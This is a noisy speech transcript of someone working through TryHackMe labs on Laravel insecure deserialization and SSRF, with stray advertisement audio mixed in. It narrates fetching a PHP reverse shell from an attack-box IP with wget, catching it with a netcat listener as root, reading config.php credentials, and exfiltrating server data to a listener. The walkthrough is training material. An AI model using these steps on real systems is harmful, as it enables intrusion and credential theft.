So we are gonna complete this room that we left off. Uh, Before we start that, I need to forget it. I will be back. My internet is sucking for some reason. Uh, we were in this right. Let's do that. Mm, my internet is sucking for some reason. Let's go. It's in this off directory. Let's copy that. Mm, it feels weird. We are doing it another day. Uh, CD paste plus. Yeah, we have that. Now, we need to do this. All right. Mm. Yeah, it's a laggy one. I don't want to install this on my. Yeah, we got the same thing. Fuck, it's full screen. So you can view this. Oh my god. Now what we need to find is, for example, the output for TryHackme is the budget chain named Cake PHP RC exploits on RC1 version is this one version is this, and the vulnerability allows attacker to arbitrary command on the server by leveraging destruct. Nice. Exploiting web application. As a pentester, we focus on a Laravel website. Or we read this, right? Yeah, we read this. Now we need to do is go to this page. Control C. Let's see. Why it is not opening? Yeah, it's loading. Open it full screen. Let's go. Yeah, we got the page. Go back. Now what we need to do is we need to find that, but they are given us the what is it called, the version. Now we need to find, let's see, there is another IP. Oh, we can just type that, right? What was the / itself? Get key. Sorry, the page. Oh, sorry about that. Yeah, we got that. Here we have app key, URL encoded, and there is a payload. Okay, not a big deal. What we need to do this, then it will give Laravel's see here, we can just manually check it too. Here, as you can see, it's very laggy. I will just do the command itself. Wait a sec. Paste. Now we need to know what was 5629. 5629. 5. See, this one comes 56 is in between 5502 to 5835 in between. So this one works RC3. But what was they given? Let's see. What they given is Laravel RC. Wait a sec. We can just copy something, right? PHP. Let's see if that works. Paste. We got encoded one. Why? They did not get the encoded one. Oh. I used that B. P gives encoded one, right? Yeah, perfect. Now, breakdown the payload. But they are breakdowning this. Eliminate broadcasting pending broadcast. This project handles event broadcast in Laravel. Here, it's primarily a vehicle for carrying a nested malicious object. Eliminate notifications channel manager. This object manages notification channel we manipulate to inject arbitrary code execution through its properties. App, which typically would reference the application service container. We must misuse it to hold our command overnight. We also manipulated the default channel or The default channel and custom creator properties that are set to create a scenario where PHP assert function is called, executing any code passed to it. As we already know, Laravel initially employed encrypted and serialized cookies to securely store session and CSR token data. Using the same methodology for both, if we visit the wonderful app, we can see the encrypted and serialization cookie as shown below. Yeah, alright, we will go there. The basic idea was to avoid tampering with the data from the bad actors, but nevertheless, they did not realize that even such a strong security mechanism could be breached through insecure serialization. Now that we have the app key, the payload, it's time to create an encrypted CSR token for the sake of this room. We have to prepare PHP script that would take API key and the payload as an argument and return the encrypted token. You can link at yes, Control C, uh, Control V, uh, inspect, storage. Yeah, we have that. But what we need to do is, for the convenience, the URL already has URL encoded key and the first payload with OMI command. Understanding the encryption mechanism for the framework like Laravel and WordPress is a simple task, but currently it's out of scope of the room. When pentesting, web framework like EKPHP and Laravel is essential to understand that each framework has unique routing and encryption mechanism despite all being built on PHP. These frameworks are designed with different attribute, architecture and security implementation, which means a vulnerability like RCE3 in Laravel, especially exploiting Laravel's serious container and serialization behavior would not necessarily apply to WordPress or other PHP-based systems. WordPress, for instance, has a different structure and does not use Laravel's specific class or method, so an exploit tailored for Laravel architecture won't directly work on WordPress. Now we can have encrypted token. We can make a simple post request using crf token as shown below to execute the command. The payload result will appear at the start of the curl. We need to do this, but to get that we need to do is we need to add that app key and the payload. Let's try that. Do I need URL encoder? Maybe. Let's that itself copy and app key. Here we will paste it. Control V. Now for the payload, we need to make a payload first. There is this one payload. Let us copy. Control V. Enter. Won't overlap. We got this. Okay, what we need to do is, uh, can we directly inject it here? That is nothing happened. So what we need to do is go to our this and no, not here. Wait a second, I'm getting a bit confused. So we need to do this, right? So we are gonna paste it here. Huh? What the hell is this? Wait a sec, guys. I messed something up. Copy. Uh, we can just enter that. It will get some error. Yeah, command not found. And yeah, we got this. So we need to paste this. So to paste it, let's create a new terminal. Huh? When you tab, let's see, we need to copy this. Curl token copy. And we paste it. And what we do is we take Control C. Is it copied? I think so. Copy and paste. That's it, I guess. Oh, even something, a code, I guess. What the hell am I got it? I'm getting some gibberish thing. The suck, what should I? Let's see. What is the vector for exploiting code key for? Let's see. What is that? We'll see. I don't know what is that. Just given. Let's see. Wait a sec. I may need to know this. There is only half a limit. Let's see. They will yes will we will do a simple that. What was the question again? Vector exploiting. This is the vector for what? Vector is this one. Disrupt RC R F1 R F1 R. What the hell does RF1? Slang code की का RF1. Oh ho ho ho. I'm sorry guys. I do not need this Laravel. I don't know why I wrote that. RF1 is this. It is string copy and we will paste it in here. But let's do this itself. Oh, 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 there we have it. We did not did that. Wait a sec. What the hell is that? Hmm. Alright, we will do this. And we will pipe it. HEAD at, what is that? Minus N2? Minus N2. Minus N. Let's see. We got the root. I guess I did the right thing. Then why I made it? What is the output for? Oh my, that is root. What is the output for the output of the uname or command variable application? Let's try that. I don't know if it's a base 64 or what. Let's check. Yeah, it is base 64. So what I am going to do is, where the hell is the terminal? Copy, paste. What was the uname or uname a? What does that command do? Copy. We are gonna do curl, right? Yeah, they are gonna do curl, I guess. Copy, paste. Copy, paste. Now what we are gonna do? First we need to close it. Close and pipe HEAD at minus M2. Okay, document HTML. Is that the answer it is looking for? It did not work for some reason. I missed some process, I guess. Wait a sec. Yeah. What I missed, I remember. So what I missed is I need to copy this section. Copy. And we will paste it here. Right, now the payload we got. Where the hell is that? Uh, Not this one. This payload. We will copy it and paste. No, it will give us this one. That is what I missed. So I am not an expert in anything. Wait a sec. Uh, Copy, paste. Now I need to do is, what the hell is this? Copy, paste. Sorry, we need alright. That sound is very H-E-A-D, head, right, at minus, oh, and must break time. H-E-A-D at minus n. I'm still getting the, what am I missing? Uh, why not need that? Maybe. We will find out. Let's do that. Yeah. You. Now what we need to do is we need to take this. Uh, Copy and we will control V and send it. Copy. Now we just need to copy, paste. Uh, let's see, AD minus n2. For some reason, I'm not getting it. M3. No. Plus. Let's found out why it is happening to me. Control C. Uh, that is Tamil all. Try ask me.
Bobo, you finally see. So we have this one. Let's open another window. Or and then we
It
can
it takes that.
copy this
Okay.
and then come to our CV. We can remove this payload there. We can do Shift and remove that. Paste new one. Then we get these new things. Then we can come to this. This one we can do. We only need this one. Token, we get our new token there, so just copy it and then paste it there. So and then head minus, and let's see what happened, minus 3. And
He
then
used
we can
3.
see it's written here 0. I'm not sure if
Let's try from the first.
through. So we can do uname minus r,
Yeah.
and then we can
He takes that.
come to our CV.
Then he goes to our
This
payload page.
this one we can do. We only need
That's the exact same thing I did. Let's try again. See. Uh, I don't think so. It is wrong. I can send that PHP too. But for the sake of this, then we got this. Uh, Now I know need to go to this. And we will copy the sec. The sec we will create new one. Uh, Control C, Control V, and is equal to we will go to this payload and wait what was the app key. Not this, right? We need URL encoded. Control C. Uh, Control V. And now I need a payload. That is in here. Copy. And we send it. Do I need the URL encoded there? I think so. But this not work. I got the token. But before that, think I paste. Now I just need that. Let's see. Copy this. Select all. I guess it is full copying. Paste. HEAD head minus M3 user M3. What was the wrong in this? I was messing up something. So there is 0, there is Q. I don't know why. I'm messing up something, but forget it. So that's how we completed our. I could have figured it out for multiple times trying it, but for quick access, I refer the YouTube. Let's forget it. It is loading so badly. No, mitigation is. Mitigating the risk associated with the insecure deserialization is paramount in ensuring the security of web application. By implementing effective defense measure, organization can significantly reduce the likelihood of exploitation and mitigate potential damage. We'll discuss this from the perspective of red team pentester and secure code. Red teamer and pentester perspective. Code-based analysis. Conduct a comprehensive review of application serialization mechanism. Identify potential points of deserialization and serialization throughout the code base. Vulnerability identification. Use static analysis tool to detect insecure deserialization vulnerabilities. Look for improper input validation, insecure libraries, and outdated dependencies. Fuzzing and dynamic analysis. Employ fuzzing technique to generate valid or unexpected input data. Use dynamic analysis tool to monitor the application's behavior during the runtime. Error handling assessment. Evaluate how the application handles error during deserialization. Look for potential error message or stack traces that reveal system details. Secure coder perspective. Avoid insecure serialization formats. Avoid using inherently insecure serialization format like Java serialization. Choose safer alternatives such as JSON or XML with reverse validation mechanism. Avoid evil and X4 Avoid using eval X function as they can execute arbitrary code and pose significant security risk. Input validation and output encoding. Implement statement into validation to ensure that only expected data is accepted. Only output encoding techniques and sanitize the data before serialization. Secure coding practice. Follow secure coding practice recommended by security standards and guidelines. Adopt principles such as least privilege, defense in depth, and fail-safe default. Adherence to guidelines. Establish secure coding guidelines specific to the programming language or framework. Is it good to practice blindly use? No. Conclusion. In conclusion, the Roman security serialization has provided a thorough understanding of this critical security vulnerability and its impact on web application. We shared by exploring the fundamental concept of serialization and insecure serialization. We then divided into various serialization formats used in different programming languages to understand the diverse manifestation of this vulnerability. Next, we learned how to identify insecure serialization vulnerabilities within applications. Through practical exercise, we explored exploitation technique including updating properties and object injection to comprehend the multi-factor nature of the attacks leading to remote code execution. Through practical exercise, we explore finally, we discuss the mitigation measure to secure application against these vulnerabilities and review automation script to streamline the identification and remediation process. This room has equipped you with the knowledge to identify exploit and mitigation measures, mitigate insecure serialization vulnerabilities, strengthening your overall security posture. Wait a sec, I found something. Let's see. Let's go here. And let's go. 1064 117 176. I thought it's automatic. 117 1064 117 port 9001. All right. We will take this itself. Copy. We need PSP, right? Is this? I guess. I don't know. Let's try that. I copied that. Right. Let's again copy that. Copy. And what if? What the? Uh, paste. Why is the double quote? I understand. Now let's see. I guess I do not need that. Where is that unexpected? Uh, mm-hmm.
This one.
ನಾನೆಲ್ಲಿ ನಿಲ್ಲಲ್ಲಿ
ನೀನ್ ಹುಡುಗಿ ಬಾಲ್ಕನಿಯಲ್ಲಿ ನಿಲ್ಲು, ಅಲ್ಲಿ ಬಿಸಿಲು ಬರೋಲ್ಲ.
ಬಿಸಿಲಿಗೆ ಯಾರು ಹೆದರ್ತಾರೆ?
ಇಲ್ಲಿ ಕೇಳು, ನೀನು ವಿಕೆಟ್ ಕೀಪಿಂಗ್ ಮಾಡು, ಅಲ್ಲಿ ಎಲ್ಲಕ್ಕಿಂತ ಹೆಚ್ಚು ಬಿಸಿಲು ಬೀಳುತ್ತೆ. ಬಿಸಿಲು ಮತ್ತು ಸೀನಿಯರ್ಸ್ ಇಬ್ಬರನ್ನು ಸೋಲಿಸೋಕಿದೆ. ಅದಕ್ಕೆ ಬೂಸ್ಟ್ ನ ಹೊಸ ಕೂಲ್ ಮಿಲ್ಕ್ ಶೇಕ್. ಬೂಸ್ಟ್ ಈಗ ಕೂಲ್ ಮಿಲ್ಕ್ ಶೇಕ್ ನಲ್ಲಿ.
So many documents, spreadsheets, videos to go through, and the deadline is tomorrow.
Not sure if it does like this one. Let's try it. It could be. Is not part of the answer. This is. Oh, well, so I found the shell because let's do a quick shell. Where is the shell table? Let's do the port 9001. Hold on, where is my friend NC? Just NC is LVMP 901. So we have that. What shall we can do? Let's do. Is there encoding? Do base64 encoding so you don't have problem. If I copy that.
No, I understand. No, I understand. Start the recording. So we are gonna do is something crazy. Let's go. We will take this and we will there it is encoding. We will do this. Guys, today I am gonna show you insecure deserialization attack. Guys, today I am gonna show you attacking serialization website, vulnerable serialization website. So we are gonna take the reversal. Let's see. Let's encode that to base 64, and we will copy that. Good. Copy. And now we will go to our terminal. As you can see, I tried this before, but I got no. Let's do echo. Paste.
Does me. Let's try different.
Uh, so we will take this and put it in echo and pipe it to BSE base 64 D decode, and that's it. We will send it. Then we get our, what is this called, token payload, something like that. Then we will go to our website. There it is. This is the one. It is the website. So we are gonna do is yeah, control V. We pasted ours, and then we get this copy, and we will go to in the terminal. Before that, I need nutcat LEP and 9001, I guess. It is listening. All I need is I paste that. Oh my god. Wait a sec. It is not in here. Let's copy from here. Copy. Paste. And copy. And we will paste it. Let's try that. Yes, I forgot. That HEAD at n minus n2. It did not work, right? Did not work. So what we can do is at -3. Try that. Still did not get. Do I need to do the?
Copy this. Let's do new
I need a break.
ಹರಿ ಎಲ್ಲಿದೆಯೋ ಬಾಸ್ ನಿನ್ನನ್ನು ಹುಡುಕ್ತಿದ್ದಾರೆ
ನನ್ನ ಪೋಸ್ಟ್ ಲೈಕ್ ಮಾಡಿಲ್ಲ सर OTP
Ah,
Head minus 8. No, it's not working. Let's do this. Let's do the old tricks. Old tricks. The PHP one. Straightforward. PHP monkey. That one. Not encoding. Just get a normal one. Copy it. Let's do that. And then let's do our server. Python 3 minus m http.server. And then we can come here. And now we don't do this, we just do this.
duplicate.
http 10.10. My attack box IP 21.10.10.125.167 8000 shell.php. Yeah, that's it. Let's copy that. Remove that. Oh, hold on. Payload equal. And then we can go to this one. It did work for me before, yeah. So I'm not sure. Paste. Sorry. Head minus 3 or 2, whatever. Let's see our server. Did it pick up anything? Okay, we got it. So we have the shell went through, was downloaded. So we can go now to this and let's call our shell.php file. And we got the shell. Where is it? Now we got shell ID ls.
So guys, I'm gonna keep it open here. Fixed. And we will paste it here. And we'll pick this up. Not this, we will go to HTTP payload and copy that. So we are gonna do it, guys. We will go to PHP Pentesting monkey. We do not need the base 64 normal one. Yeah, we will copy that and will go to new terminal, and here we will create nano CGL dot p equals p, and we will paste it here, and we will exit it out. Control 0, Control X. Now we need to open Python. Python 3 wait a sec. Python server. Wait a sec. Just a minute. Very easy. I was just forgot sometimes. We will open the server. Till now what we did, we gone to, first you need to go to reverse, you know, right, this, I don't need to speak like that. Wait a sec. Hello guys, today I am going to show you how to hello guys, today I am going to show you how to exploit deserialization, whatever. So first I am gonna take this PHP Pentest monkey and copy the file, and I am gonna go to our terminal, and I will paste it in the nano shell, and we will open this HTTP server here. Then we will go to our another terminal, and we will write the payload. What would be the payload to get it? That is wget HTTP and my IP 10.64, right? 177. Sorry about that. 117 and 176 wget, and we are gonna use, wait a sec, uh, 8000, 8000 to retrieve shell shell dot php, right? That is it. Now we got this, we will copy that, and we will take it to here, and we will upload it in the payload. Did I already? Is this the same one? Wait a sec, I will do it again. Yeah, we did it. So we got this. So we are gonna copy that, and I will take it to the terminal. I am just lazy, you can just do it in one page itself. I will paste it here, and we will pipe it at HEAD at n minus n point. Let's see. Did we get any reaction? No, we did not. Why is that?
That's it.
Look at HTTP sold up.
Let's go.
Mhm.
Copy that. Remove that. Oh, hold on.
Then last final try. Start recording. Guys, we are gonna do this, guys. Insecure deserialization. So first we are gonna do is we are gonna create a Python server. I think it is already running. There it is. We have shell.php. Wait a sec. Nano. Alright, that is going good. We will next run the Python server. Alright. Now what we need to do is we are here. Yeah, this one. We will run that. Right. Everything is perfect. So we get this. We will copy that. Copy. Then we will head to this, not this one. Uh, we are gonna paste it and we will send it. By sending that, we get this. We will copy that. Go to our terminals and let us say, guys, I am gonna paste it here for a minute. Then I am gonna copy this code. Paste. It is not cat running, right? Not cat is still running. Uh, we need to copy this. Copy. We will paste it. And in here we will do is HEAD add come to. Did that work? No, it is not working for some reason. What if I do M3? Does that work? No. It is not fetching at all. For some reason, what am I don't know what I'm missing. What we are gonna do is, wait a sec. We are gonna copy this. Copy. And first we will copy this. Copy. And paste. And we will get the key from here. Copy. Wait a sec. Control C. Paste. And we will go here. Copy. And if we paste it, then we need is that payload, right? And pay is equal to payload is equal to, let's see, where copy, paste, duplicate, HTTP, that is correct. We got this, we will copy it, and that should go to our new page. Paste, enter, and we get this. Copy, and we will go here. I will just manually do it. If it does not work, I don't know. And I tried every possible way to do it and still failed. There we have it. So we are gonna do is find it. No, it worked. It worked. It worked. Where is that? It worked. Yeah, it worked. Now I just need to do is all that. Uh, P and paste shell shell dot php. There we have a successfully opened the shell. Who am I? Root ID. Alas, as you can see, if you did not see, wait a sec. That is not working. So see, as you can see, who am I? ID. Alas, we got it. Thank you for your cooperation. For the next round, it's a sort of uh, so we are gonna close this, terminate the machine. So and we are gonna start our own. Start the machine. Uh, uh, and there we have it. Let's go. So we are in for this. Hello guys, today we are gonna do web application pen testing, advanced server side attack, SSRF. SSRF. Discover the inner working of SSRF and explore multiple exploitation techniques. Nice, let's go. Start the machine, let's go. The landscape of web attacks constantly evolves. Threat actors deceiving sophisticated method to compromise systems as each day passes. The expansion of web-based threats warrant the need for robust cybersecurity measures to counter the ever-advancing tactic employed by malicious actors. In this room, we will discuss a similar attack known as server-side request forgery (SSRF). SSRF is a web application security vulnerability that allows the attacker to force the server to make unauthorized requests to any local or external source on behalf of the web server. SSRF allows an attacker to interact with internal system, potentially leading to data leaks, server disruption, or even remote code execution. Learning objective: understand the working of SSRF, practically testing various types of SSRF, your important tools for exploitation, key mitigation, and defensive measures. Learning prerequisites: you need to know this. Our website work, protocol and service, and also uptime. Connection, connecting the machine. What the hell is this? We will use a vulnerable human source web app to the room to understand. Alright. You can access website using, but first you need alright. So we need to add a host name to our file. Let's see. Nano etc host. And what was the unwritable? Alright, I messed up. So no etc now let's go our IP. Paste. What will be the name? We are given the name. That would be paste. Yeah, we done that. So first one is completed. I can access on this website. Let's see, can I access? Control C. Paste. What? Day by day I am losing it, man. Yeah, oh my god. Very good. I like the theme, dude. Now, autonomy of SSRF attack. When developing network software, it's common to make requests to external servers. Developers often use these requests to fetch remote resources like software updates or import data from other applications. While these requests are typically safe, Improper implementation can lead to a vulnerability known as SSRF. Uh, Support to server, web server makes a request on behalf of user, victim server will send to web server. It will direct not, it goes like this. Alright. An SSRF vulnerability can arise when user provides data is used to construct a request, such as forming a URL to execute a SSRF attack. An attacker can manipulate a parameter value within the vulnerable software, effectively creating or controlling requests from the software and redirecting them towards other servers and even the same server. SSRF vulnerability can be found in various types of computer softwares across a wide range of programming language and platform as long as the software operates in the networked environment. While most SSRF vulnerabilities are commonly discovered in web application and other network software, they can also be present in server software. WASP of banking. SSRF is formidable security threat, earning the spot in OWASP top 10 list, making it imperative to understand and defend against it as it jeopardizes data integrity and application security as per OWASP. Factors regarding SSRFs are mentioned below. Max incident rate 2.7%, average incident rate 2.7, average weighted exploit 8.2, average weighted impact 6.72, max coverage 67, total occurrence 9500, total CV is 385. Oh my god. The above table provides insights to prevalence, impact, and coverage of SSRF vulnerability in a specific context of dataset and OSF measure. The interpretation of the table is explained below. Max incident rate. It suggests how this vulnerability has been encouraged relative to other vulnerabilities in OWASP. Average incident rate shows how common this vulnerability is compared to others. Average weighted exploit. Incident, the average difficulty or effort required to exploit SSRF. Oh my god, that is 8. Average weighted impact. Average potential impact or severity of exploiting SSRF. Max coverage. It indicates how much of the system have been exploited due to this vulnerability. That is 67%. Total occurrence, that is, let's see. Note, SSRF vulnerability ranks 7 in OWASP top 10. Risk of SSRF. Data exposure. As explained earlier, cyber criminals can gain unauthorized access by tampering with the request on behalf of the vulnerable web application to gain access to sensitive data hosted in the internal network. Reconnaissance. An attacker can carry out port scanning of internal networks by running malicious script on vulnerable server or redirecting to script hosted on the same external server. Attacker can carry out port scanning of internal networks by running malicious script on vulnerable server or redirecting the script hosted on the same. Denial of service. It is a common scenario that internal networks or servers do not expect many requests. Therefore, they can configure to handle low bandwidth. Attackers can flood the server with the multiple illegitimate requests, causing them to remain unavailable and handle genuine requests. What is the average weight impact of SSRF vulnerability as per impact rate, that is 6.72. 6.72. Types of SSRF, the basics. Let's go. Basic SSRF is a web attack technique. Oh, it's a technique name itself, basic, not the where an attacker tricks a server into making requests on their behalf, often targeting internal system or third-party services. By exploiting vulnerabilities in input validation, the attackers can gain unauthorized access to sensitive information or control over remote resources, posing a significant security risk to the targeted application and its underlying infrastructure. A basic SSRF can be employed against a local or an internal server. We will discuss both scenarios in details. Scenario 1. SSRF against a local server. In this attack, attacker makes a unauthorized request to the server hosting the web application. The attacker typically supplies a loopback IP address or localhost to receive response. The vulnerability arises due to how the application handles input from the query parameter or API calls. In this attack, attacker makes an unauthorized request to the server hosting the web application. The attacker typically supplies a loopback IP address or localhost to receive the response. For example, in HRMS application, there is a feature that loads additional pages based on the URL parameter. For example, navigating to a copyright would load a copyright page of the application. This feature indicates for internal use and it is designed to request and display page from local server, as using localhost in the query. However, due to insufficient validation of input URL, an attacker can manipulate this functionality for SSRF attack by changing the URL parameter to point to other pages. Service. The attackers can force HRMS servers to make requests to other page. For instance, if an attacker uses URL like config, they changed this localhost to copyright to config, and the config is a valid page, the HRMS server will attempt to fetch the content from this page and display the result. The main idea of the force a legitimate request and make the server perform an unintended action of it works. Suppose you have been tasked to pentest HRMS website and identify any SSRF loopholes. Visit site and you will see that login page is protected through username and password. It is. We will notice that once we visit the page, it automatically redirects us to the page shows the copyright status. Wait a sec, does that do it? I don't know. Yeah, it is here. Yeah. This means the developer has probably made some mistake while handling a file showing the copyright status. Here is the code of the page that takes the query parameter. URI, path, root path, file. If file exists, path, echo, HTML special character, file get content. We can see the above code that input parameter URL lacks adequate filtering and loads whatever the parameter is provided from the localhost. Let's try the challenge from change the URL from localhost copyright to hello it displays the error that hello PHP is not found. Oh, it found PHP files. Oh, so the page calls for another PHP file and display it to it on the current page footer. What if we call sensitive files like connection PHP or config.php? When we try to access the file, we will see that the footer of the page shows the content of the file, especially showing us exact credential which would look like this. In this attack, we have learned how small mistake while handling a file input can enable bad actor to take control of the application. As a pentester, it's crucial to know that basic SSR vulnerabilities are frequently present across various types of websites, including e-commerce, banking, management system, and more, particularly in features involving file handling or external resources fetching. What is the name of the what is the username of permanent login panel? Username. Let's see if we will do config.php. We get this. Username is copy. What is the password of Ernest login page? That is what is the admin URL as per the config file? What is the flag value after successfully logging? Let's see. We first learned that. Now, types of SSRF basic continued. In this task, we will continue the learning basic SSRF techniques and will dive into the second scenario. Scenario 2. Accessing an internal server. In the complex web application, it is common for a front-end developers of front-end web applications to interact with back-end of the internal server. These servers are generally hosted on non-routable IP addresses, so an internet user cannot access them. In this scenario, an attacker exploit a vulnerability web application input validation to trick the server into requesting internal resources on the same network. They can provide a malicious URL as input, making the server interact with the internal server on their behalf. For instance, if an internal server provides database management or administrative controls, the attackers could craft a URL that initiate a unintended action on this internal system. When processed by the vulnerable web application, technically this is achieved through manipulated input, such as special IP addresses like IPv4 or domain names. When not properly syntaxed, this input can be used in the functions like HTTP request or file inclusion within the web application. The server the server interpreting these requests are legitimate, then it advertently performs action or retrieves data from other internal servers. Moreover, since these internal servers may lack the same level of security monitoring as external facing servers, such as exploitation can often go unnoticed. The attacker might also use this method to perform reconnaissance within the internal network, identifying other vulnerable system or service target. How it works. In this case, we will try to access the inaccessible internal resources through direct request. Now that we have acquired the credential for the login panel, we will log into the dashboard. Once we log into the HRMS webpage, we will see a dashboard listening to employees and the department. There is a drop-down that shows employees' data and salaries. From the config file, we can see admin panel is hosted at this IP. If we try to log into admin panel, it's not accessible directly. Let's try to access it. It shows an error. When we have no route to that IP as it's a private network IP and can only be accessed by a machine within the same network. If we check the source of the HTML, it shows that drop-down takes URL from internal system to render the data. The details of all employees are being rendered from http employee.php. That's good. So the drop-down is accessing the internal system. What if we try to change the request, such as instead of loading the employee page, we force the request and send http admin as parameter to the server? Let's do that. Use the inspect element option and change the drop-down value of salary from uh, to admin page as shown below. Let's try that. Uh, let's try that. It is local info, get info. Now what we need to do is we got this. So as you can see, we cannot access it. That is what they told us. My internet is hacking for some reason. Now we are in this page. Uh, uh, where the hell is that? I can just do that, right? Inspect. Wait a sec. There should be, right? But I cannot see it. How to make it bigger? How to... Uh, Let us drop down, right? Uh, Content goes here. I cannot find that drop down. Oh, there it is, the drop down. But yeah, we got it. Here it is. Now we need to change it, right? We need to change the salary to admin PHP. Once you update the value, choose the salary option from the salary drop down. Here we go. We got admin panel. Let's see. We need to change this salary to. I guess you can see, right? It is very small. Yeah, we changed that. And we will go and change the salary. We will get the login page. Yes. Congrats, Sunny. Congrats. We got the flag too. Coffee. Is accessing non-routable address possible if the server is vulnerable to SEO? Yeah, we just did that. Let's go to it. Let's just do the summary of what we did. So we got this from ipconfig, but we cannot access it directly. Then when the code was reviewed, we got this in the drop down. There is this particular URL to URL is that when we changed this URL to admin, and when we in the page we changed this to salary, we triggered directly our admin PHP that we changed. So first one we found in URL, there was localhost, that's how we found. Second one, in the code there was buttons. You can understand SSRF blind type. Let's see. Blind SSRF refers to a scenario when attacker can send requests to the target server, but they do not receive a direct response or feedback about the outcome of their request. In other words, the attacker is blind to the server response. This type of SSRF can be more challenging to exploit because attacker cannot directly see the result of their action. We will discuss its various example. Blind SSRF with out-of-band. Out-of-band SSRF is a technique where the attackers leverage a separate out-of-band communication channel instead of directly receiving response from the target server to receive information or control the exploited server. This approach is practical when the server response are not directly accessible to attacker. For instance, attacker might manipulate the vulnerable server to make DNS requests to the domain he owns or uh, initiate a connection to the external server with a specific data. This external interaction provides the attacker with evidence that SSRF vulnerabilities exist and potentially allows him to gather additional information such as internal IP addresses or the internal network structure. How it works. Once again, log into the dashboard and click on the profile tab in the navigation bar. We will see that it redirects to http hrms.thmprofile.php. URL is equal to localhost getinfo php, which displays a message that data is being sent. It works once again. Log into the dashboard and click on the profile. Tab in the navigation bar. We will see that it redirects to profile.php. What happens once we load profile.php? It sends data to external page named getinfo.php, which is probably used to analytics or log. The source code analysis of the page shows that it is reading URL parameter and without performing any validation, it sends the information to the server mentioned in the URL parameter. Here an attacker can redirect the request to the server, thus getting additional information for exploitation of the data storage. On your attack box, create a new file called server.py and add the following code. Alright. Wait a sec. Control C. We need a server, right? Okay, let's see. CD. What the hell? Nano. Server.py, right? Server.py. Paste. There's no IP all enabled, alright. And we will save it. Control X. And we exited. Now, in the above code will receive all the content and save it to the file data HTML. On the server, to obtain the data, we first need to start a lightweight server. We can do this in attack box by following the command sudo chmod server They are running that. Wait a sec. Paste. Smooth. They are giving execution permission and they are running that. Why? Uh, address already in use. Wait a sec. Nano server dot Ah, I understand it. The we will go like 888 and also go like 8888. Is that everything that we needed? Yeah, control 0, control X. As server running on HTTP, yes, we are running the server. Now open the browser and open Control C, which will log in the open the data HTML file which will contain all the essential information related to server that can be used to launch further attacks. Let's see. That is 888 and our IP will be 192 168 237 55. Yeah, that's it, right? Now we will go there. Yeah. I did not get that. It is a very wait a few seconds. Now open the browser and open which will log the data. Data is down. Is that so? Did I get something? Wait a sec. Yes. Get data HTML. Wait a sec. How to view HTML file. Yeah, we will use this copy and we will paste it, but it would be data. Yeah, we got that. So how we get it? Let's see. First we found this. It was saving the everything into get info PSP. then we created a server.py, this one. You are know the code, then you are good to go. Just read it. And then we give the code executable permission, and we created a server here. And we send that server.py in this. No. We retrieve that server.py in this, and that got me data HTML, and voila, we have it. Semi-blind CRF time-based. Time-based CRF is a variation of SRF where the attacker leverages timing-related clues or delays to interfere the success or failure of their malicious request by observing how long it takes for application to respond. The attacker can make educated guesses about whether their SSRF attack was successful. The attacker sends a series of requests, each targeting a different resource of URL. The attacker measures the response time for each request. If a response takes significantly longer, it may indicate that the server successfully accessed the target resources, implying the success of SSR. Thus, out-of-band SSR always include a technique in which attacker always receive direct responses from the server. Now, what is the value of virtual directory support on the PHP server for logged data? Virtual directory. This value of disabled. Is that it? What is the value of PHP extension built on the server? PHP extension. You can just copy the answers. Huh? What happened? Oh, sorry. My eyes are very bad. Which type of SSRF doesn't give us a direct response or a feedback? Blind. Now, a classic example, crashing the server. An attacker could abuse SSRF by crashing the server or creating a denial of service of other hosts. There are multiple instances, WordPress, Geico SVG, where attackers try to disrupt the availability of system by launching SSRF attacks, crashing the server. In this SSRF demonstration, we will illustrate how an attacker can exploit a web application and to cause a denial of service on the service. In our scenario, the vulnerability is exploited by supplying a malicious URL that points to a resource which, when accessed by the server, leads to excessive resource consumption or trigger a crash. For example, the attacker might input a URL pointing to a large file on a slow server or a service that responds with an overwhelming amount of data. When the vulnerable application naively accesses this URL, it engages in an action that exhausts its own system resources, leading to slowdown or a complete crash. How it works: once we log into the dashboard, we will see a tab called Training. In the navigation bar, which is used to load the training content of the employees. Once we click on the tab, we will see that it redirects to the URL which shows training content. Oh, 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 oh. We notice URL PHP file is loading external content displayed here. What if we try to load other content? Try opening the file. Uh, we need to change this, right? 10, 10, 10, 10, 10, 10. All right. We will go to training. Uh, Try opening the file. Just a sec. Now that we know the server is all out of this, let's explore. Once we access, we will see the following code at the footer. For some reason that my attacks are not going through. The above code shows that URL PHP loads an image. If the image says exceeds 100 KB, it shows the memory outage message and throws an error. Let's try to patch the server by loading a image greater than 100 KB. For your convenience, we already have such image available. Which can forgive you. So we need to crash it for big time. Uh, uh, the hell is this? Big image. Proceed with the sack. Uh, not getting dude. We will do it tomorrow, guys. That's it for today.